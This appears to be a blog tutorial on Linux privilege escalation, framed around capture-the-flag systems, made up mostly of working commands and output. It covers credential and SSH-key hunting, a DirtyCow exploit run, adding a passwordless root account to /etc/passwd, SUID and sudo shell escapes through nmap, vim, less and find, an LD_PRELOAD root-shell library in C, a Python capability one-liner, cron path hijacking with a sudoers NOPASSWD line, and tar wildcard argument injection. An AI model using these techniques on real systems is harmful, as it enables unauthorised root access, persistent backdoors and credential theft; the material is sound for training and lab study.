Linux Privilege Escalation

Linux exploitation often boils down to what files are you able to read and write to, and do these files have any bearing on the security of the system.

A number of privilege escalation techniques are covered in this article, including:

Basic Enumeration

# Hostname
hostname

# Kernel version
uname -a

# Show running processes
ps aux

# List users
cat /etc/passwd

# Check Bash history
cat $HOME/.bash_history

# Check IP addressing
ip a

# Check routing
ip route

# Check ARP mapping
ip neigh
arp -a

# Show listening network services
ss -ltpn

# Search for passwords in files
fgrep --color -Rsi "password" *

# Search for files with password in the name
find / -iname *password* 2>/dev/null

# Find SSH keys
find /home -iname id_rsa

Automated Enumeration

ToolNotesURL
LinPEASProbably the most comprehensive.https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
LinEnumMay find some items missed by LinPEAS.https://github.com/rebootuser/LinEnum
Linux Exploit SuggestorUseful for identifying Kernel vulnerabilitieshttps://github.com/mzet-/linux-exploit-suggester
Linuxprivchecker.pyPython basedhttps://github.com/sleventyeleven/linuxprivchecker
PSpyMonitors processes executing, such as cron jobshttps://github.com/DominicBreuker/pspy

Kernel Vulnerabilities

Linux exploit suggester can be ran to determine potential vulnerabilities based on the running Kernel version:

./linux-exploit-suggester.sh 

Kernel version: 2.6.32
Architecture: x86_64
Distribution: debian
Package list: from current OS

Possible Exploits:

[+] [CVE-2010-3301] ptrace_kmod2

   Details: https://www.exploit-db.com/exploits/15023/
   Tags: debian=6,ubuntu=10.04|10.10
   Download URL: https://www.exploit-db.com/download/15023

[+] [CVE-2010-1146] reiserfs

   Details: https://www.exploit-db.com/exploits/12130/
   Tags: ubuntu=9.10
   Download URL: https://www.exploit-db.com/download/12130

[+] [CVE-2010-2959] can_bcm

   Details: https://www.exploit-db.com/exploits/14814/
   Tags: ubuntu=10.04
   Download URL: https://www.exploit-db.com/download/14814

[+] [CVE-2010-3904] rds

   Details: http://www.securityfocus.com/archive/1/514379
   Tags: debian=6,ubuntu=10.10|10.04|9.10,fedora=16
   Download URL: https://www.exploit-db.com/download/15285

The below example shows the DirtyCow vulnerability being triggered:

user@debian:~$ gcc -pthread ./c0w.c -o c0w
user@debian:~$ ./c0w 
                                
   (___)                                   
   (o o)_____/                             
    @@ `     \                            
     \ ____, //usr/bin/passwd                          
     //    //                              
    ^^    ^^                               
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
mmap f00ae000

madvise 0

ptrace 0

user@debian:~$ passwd
root@debian:/home/user# whoami
root


Files Containing Passwords

Passwords may be stored in unprotected configuration files. You can search for these using:

grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;

Weak Permissions

Find files the current user can read or write to. Readable files may contain credentials. Writeable files of interest include Bash and Python scripts we can edit, that may be run by other users on the system:

find / -type f -readable
find /etc -type f -writable

Creating an /etc/passwd backdoor

If you are able to modify /etc/passwd, you can add in a new root user without a password. An account entry in /etc/password typically looks like this:

user:x:1000:1000:user,,,:/home/user:/bin/bash

The “x” character designates the users password is stored in /etc/shadow. The following two numbers are the user ID (UID) and group ID (GID) respectively.

If we create a new user without the “x” character, no password will be set. Setting the UID/GID to zero will also allow us to assume root privileges:

echo "backdoor::0:0:backdoor,,,:/root:/bin/bash" >> /etc/passwd
su backdoor
root@edgecrusher:/home/user# id
uid=0(root) gid=0(root) groups=0(root)

SSH Key Access

If SSH keys are not properly protected by filesystem permissions, it may be possible to use them to SSH into the system locally.

find / -name id_rsa 2> /dev/null
cp /backups/supersecretkeys/id_rsa .
chmod 400 id_rsa 
ssh -i id_rsa root@127.0.0.1

SUID Escalation

SetUID binaries will run in the context of another user. This is typically the root user.

The find command can be used to locate SetUID binaries. In general we’re looking for executables that don’t normally have SetUID permissions. In this instance, nmap has has these permissions so will be run as root.

find / -perm -u=s 2>/dev/null
/usr/bin/nmap
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/get_logs
/usr/bin/newgrp
/usr/bin/sudoedit
/usr/bin/passwd
/usr/bin/gpasswd

We can exploit this configuration, by running nmap interactively and specifying a command:

user@debian:~$ nmap --interactive
Starting Nmap V. 5.00 ( http://nmap.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !/bin/sh
bash-4.1$ id
uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)



Sudo Escalation

Sudo escalation is similar to exploiting SetUID binaries.

First, we can check which commands our user is able to run using sudo:

sudo -l
User user may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/man
    (root) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/sbin/apache2

Researching these commands with gtfobins, there are a number of ways we can escalate privileges.

For instance, vim running as root via sudo can be used to execute system commands:

sudo vim -c ':!/bin/bash'
id
uid=0(root) gid=0(root) groups=0(root)

A large number of commands can be exploited by just typing an exclamation mark, followed by the command you want to run. Some examples of this:

less can also be used to execute commands;

sudo less /etc/passwd
!/bin/bash

The man command can be used;

sudo man man
!/bin/bash

Also ftp;

sudo ftp
ftp> !/bin/bash

You get the gist 🙂

Other commands require setting certain command line parameters.

Apache can be used to read system files:

sudo apache2 -f /etc/shadow

The find command requires setting the exec parameter:

find . -exec /bin/sh \; -quit

Sudo LD_PRELOAD Exploitation

If LD_PRELOAD is enabled, you will likely see the following when you run sudo -l

Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD

LD_PRELOAD loads a shared library before other code executes.

We can created a Linux shared object to be loaded using the following code:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}

Compile the code, and execute with:

gcc -fPIC -shared -o shell.so shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so apache2

Linux Capabilities Exploitation

Linux capabilities allow software to execute with a certain set of rights which are normally reservered for the root user. For instance, an executable can be provided with the ability to capture packets without giving it the ability to read all files on the filesystem.

We can search for binaries with enabled capabilities with the following command:

getcap -r / 2>/dev/null
/usr/bin/python = cap_setuid+ep

A capability of +ep means that all capabilities are permitted when the application starts.

In this specific example, since Python is running as root we can exploit this by running a shell one liner;

/usr/bin/python -c 'import os; os.setuid(0); os.system("/bin/bash")'

Cron Job Exploitation

Cron job run tasks on a scheduled basis. In this example, reviewing the contents of /etc/crontab we can see a couple of Bash scripts are set to execute every minute.

cat /etc/crontab 
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root myscript.sh
* * * * * root /usr/local/bin/upload.sh

If we have write access to myscript.sh or upload.sh, we may be able to add code that executes when the cronjob is run.

Additional cron files may also be found. Running a recursive listing should show them all:

ls -laR /etc/cron*

Cron Path Exploitation

The top of the cron file specifies a path which is used to determine where executables should be run from.

cat /etc/crontab 
SHELL=/bin/sh
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

In the previous example myscript.sh was not provided with an absolute path. Because of this, cron will check the path variable to determine where it should look for this file, starting with /home/user.

We can create /home/user/myscript.sh with the following contents:

echo "chmod u+s /bin/dash" > myscript.sh ; chmod a+x myscript.sh

Note, that later versions of bash may drop their privileges even with the SetUID flag set. In this instance, you can edit the script to add our user into sudoers file, allowing us to execute any command:

echo "hacker ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers

Shell Expansion Exploitation

Let’s say you have a script which runs regularly to perform a backup of files in a users home directory:

#!/bin/sh
cd /home/user
tar czf /tmp/backup.tar.gz *

The asterisk used in the tar command will be expanded by the Bash shell to include all files in the directory. However, we can exploit this condition by creating files with arguments that will be parsed by the tar command. We can do that by creating the following files:

touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=sh shell.sh"

When the backup is run, the contents of shell.sh will also be executed.


Closing Thoughts

This post covers a few common Linux privilege escalation techniques, which are common on Capture the Flag systems. I’ll add some additional techniques over time.